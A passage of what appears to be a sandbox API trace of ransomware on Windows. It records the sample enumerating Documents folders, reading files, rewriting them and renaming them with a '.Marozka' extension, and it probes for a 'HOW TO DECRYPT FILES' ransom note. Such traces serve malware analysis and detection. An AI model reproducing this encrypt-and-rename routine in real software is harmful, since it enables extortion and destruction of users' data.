v351zwS\\T6YzsYK-KVX.pdf", lpFilePart=0x0) returned 0x46 [0052.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\t6yzsyk-kvx.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.714] GetFileType (hFile=0x2e0) returned 0x1 [0052.714] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.714] GetFileType (hFile=0x2e0) returned 0x1 [0052.714] WriteFile (in: hFile=0x2e0, lpBuffer=0x26e09a8*, nNumberOfBytesToWrite=0xe5f0, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x26e09a8*, lpNumberOfBytesWritten=0x5be9c8*=0xe5f0, lpOverlapped=0x0) returned 1 [0052.716] CloseHandle (hObject=0x2e0) returned 1 [0052.720] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf", lpFilePart=0x0) returned 0x46 [0052.720] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf.Marozka", lpFilePart=0x0) returned 0x4e [0052.720] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.720] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\t6yzsyk-kvx.pdf"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x498ec1c0, ftCreationTime.dwHighDateTime=0x1d4c848, ftLastAccessTime.dwLowDateTime=0xae95af90, ftLastAccessTime.dwHighDateTime=0x1d4ccfb, ftLastWriteTime.dwLowDateTime=0xe227da18, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xe5f0)) returned 1 [0052.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.721] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\t6yzsyk-kvx.pdf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\T6YzsYK-KVX.pdf.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\t6yzsyk-kvx.pdf.marozka")) returned 1 [0052.721] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", lpFilePart=0x0) returned 0x47 [0052.721] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.721] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\xtgnmixgq ef.odt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.721] GetFileType (hFile=0x2e0) returned 0x1 [0052.721] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.721] GetFileType (hFile=0x2e0) returned 0x1 [0052.721] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0x7a6 [0052.722] ReadFile (in: hFile=0x2e0, lpBuffer=0x26efd28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x26efd28*, lpNumberOfBytesRead=0x5be9d4*=0x7a6, lpOverlapped=0x0) returned 1 [0052.722] CloseHandle (hObject=0x2e0) returned 1 [0052.744] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.744] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.744] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.745] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.745] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", lpFilePart=0x0) returned 0x47 [0052.745] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.745] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\xtgnmixgq ef.odt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.746] GetFileType (hFile=0x2e0) returned 0x1 [0052.746] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.746] GetFileType (hFile=0x2e0) returned 0x1 [0052.746] WriteFile (in: hFile=0x2e0, lpBuffer=0x2740438*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x5be99c, lpOverlapped=0x0 | out: lpBuffer=0x2740438*, lpNumberOfBytesWritten=0x5be99c*=0x7b0, lpOverlapped=0x0) returned 1 [0052.747] CloseHandle (hObject=0x2e0) returned 1 [0052.748] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt", lpFilePart=0x0) returned 0x47 [0052.748] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt.Marozka", lpFilePart=0x0) returned 0x4f [0052.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.748] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\xtgnmixgq ef.odt"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe24cbc50, ftCreationTime.dwHighDateTime=0x1d4c69a, ftLastAccessTime.dwLowDateTime=0x63066990, ftLastAccessTime.dwHighDateTime=0x1d4cd1c, ftLastWriteTime.dwLowDateTime=0xe22c9eae, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x7b0)) returned 1 [0052.748] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.748] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\xtgnmixgq ef.odt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\-lw4atN v351zwS\\xtGNMIXgq EF.odt.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\-lw4atn v351zws\\xtgnmixgq ef.odt.marozka")) returned 1 [0052.748] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.748] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8", lpFilePart=0x0) returned 0x35 [0052.749] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d748 [0052.749] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.749] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.749] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.749] FindClose (in: hFindFile=0xa7d748 | out: hFindFile=0xa7d748) returned 1 [0052.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.750] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.750] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8", lpFilePart=0x0) returned 0x35 [0052.750] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d748 [0052.750] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.750] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.750] FindNextFileW (in: hFindFile=0xa7d748, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.750] FindClose (in: hFindFile=0xa7d748 | out: hFindFile=0xa7d748) returned 1 [0052.750] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.751] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", lpFilePart=0x0) returned 0x49 [0052.751] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.751] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\3ebjum9itsmya8\\ehr61a4s mjvywv.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.751] GetFileType (hFile=0x2e0) returned 0x1 [0052.751] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.751] GetFileType (hFile=0x2e0) returned 0x1 [0052.751] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xbc86 [0052.751] ReadFile (in: hFile=0x2e0, lpBuffer=0x2742aac, nNumberOfBytesToRead=0xbc86, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x2742aac*, lpNumberOfBytesRead=0x5be9d4*=0xbc86, lpOverlapped=0x0) returned 1 [0052.751] CloseHandle (hObject=0x2e0) returned 1 [0052.766] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.767] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.767] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.767] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", lpFilePart=0x0) returned 0x49 [0052.767] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.767] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\3ebjum9itsmya8\\ehr61a4s mjvywv.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.768] GetFileType (hFile=0x2e0) returned 0x1 [0052.768] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.768] GetFileType (hFile=0x2e0) returned 0x1 [0052.768] WriteFile (in: hFile=0x2e0, lpBuffer=0x27b2e5c*, nNumberOfBytesToWrite=0xbc90, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x27b2e5c*, lpNumberOfBytesWritten=0x5be9c8*=0xbc90, lpOverlapped=0x0) returned 1 [0052.770] CloseHandle (hObject=0x2e0) returned 1 [0052.771] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls", lpFilePart=0x0) returned 0x49 [0052.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls.Marozka", lpFilePart=0x0) returned 0x51 [0052.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.772] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\3ebjum9itsmya8\\ehr61a4s mjvywv.xls"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10282450, ftCreationTime.dwHighDateTime=0x1d4cb52, ftLastAccessTime.dwLowDateTime=0xcf537010, ftLastAccessTime.dwHighDateTime=0x1d4c9c1, ftLastWriteTime.dwLowDateTime=0xe22f0191, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0xbc90)) returned 1 [0052.772] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9a8) returned 1 [0052.772] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\3ebjum9itsmya8\\ehr61a4s mjvywv.xls"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\3ebjuM9ItSmYA8\\eHR61a4s mjVyWv.xls.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\3ebjum9itsmya8\\ehr61a4s mjvywv.xls.marozka")) returned 1 [0052.772] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.773] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp", lpFilePart=0x0) returned 0x31 [0052.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d788 [0052.773] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.773] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.773] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.773] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.773] FindNextFileW (in: hFindFile=0xa7d788, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.774] FindClose (in: hFindFile=0xa7d788 | out: hFindFile=0xa7d788) returned 1 [0052.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.774] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.774] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea80) returned 1 [0052.774] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp", nBufferLength=0x105, lpBuffer=0x5be534, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp", lpFilePart=0x0) returned 0x31 [0052.774] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\*", lpFindFileData=0x5be7a8 | out: lpFindFileData=0x5be7a8) returned 0xa7d908 [0052.774] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.775] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.775] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.775] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 1 [0052.775] FindNextFileW (in: hFindFile=0xa7d908, lpFindFileData=0x5be7b4 | out: lpFindFileData=0x5be7b4) returned 0 [0052.775] FindClose (in: hFindFile=0xa7d908 | out: hFindFile=0xa7d908) returned 1 [0052.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea3c) returned 1 [0052.775] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea48) returned 1 [0052.775] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", nBufferLength=0x105, lpBuffer=0x5be3e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", lpFilePart=0x0) returned 0x43 [0052.776] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be92c) returned 1 [0052.776] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\hn43j1byp6vek.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.776] GetFileType (hFile=0x2e0) returned 0x1 [0052.776] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be928) returned 1 [0052.776] GetFileType (hFile=0x2e0) returned 0x1 [0052.776] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5bea28 | out: lpFileSizeHigh=0x5bea28*=0x0) returned 0xe175 [0052.776] ReadFile (in: hFile=0x2e0, lpBuffer=0x27c0a00, nNumberOfBytesToRead=0xe175, lpNumberOfBytesRead=0x5be9d4, lpOverlapped=0x0 | out: lpBuffer=0x27c0a00*, lpNumberOfBytesRead=0x5be9d4*=0xe175, lpOverlapped=0x0) returned 1 [0052.776] CloseHandle (hObject=0x2e0) returned 1 [0052.836] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be4ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0052.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9a0) returned 1 [0052.836] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5bea1c | out: lpFileInformation=0x5bea1c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0052.836] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be99c) returned 1 [0052.836] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", nBufferLength=0x105, lpBuffer=0x5be3d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", lpFilePart=0x0) returned 0x43 [0052.836] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be918) returned 1 [0052.836] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\hn43j1byp6vek.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0052.838] GetFileType (hFile=0x2e0) returned 0x1 [0052.838] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be914) returned 1 [0052.838] GetFileType (hFile=0x2e0) returned 0x1 [0052.838] WriteFile (in: hFile=0x2e0, lpBuffer=0x263b474*, nNumberOfBytesToWrite=0xe180, lpNumberOfBytesWritten=0x5be9c8, lpOverlapped=0x0 | out: lpBuffer=0x263b474*, lpNumberOfBytesWritten=0x5be9c8*=0xe180, lpOverlapped=0x0) returned 1 [0052.839] CloseHandle (hObject=0x2e0) returned 1 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf", lpFilePart=0x0) returned 0x43 [0052.841] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf.Marozka", nBufferLength=0x105, lpBuffer=0x5be4f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf.Marozka", lpFilePart=0x0) returned 0x4b [0052.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5be9ac) returned 1 [0052.841] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bmYGdraeFpDv\\DIpdINpLwp\\Hn43J1ByP6VEk.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bmygdraefpdv\\dipdinplwp\\hn43j1byp6vek.rtf"), fInfoLevelId=0x0, lpFileInformation=0x5bea28 | out: lpFileInformation=0x5bea28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd3470a0, ftCreationTime.dwHighDateTime=0x1d4c679, 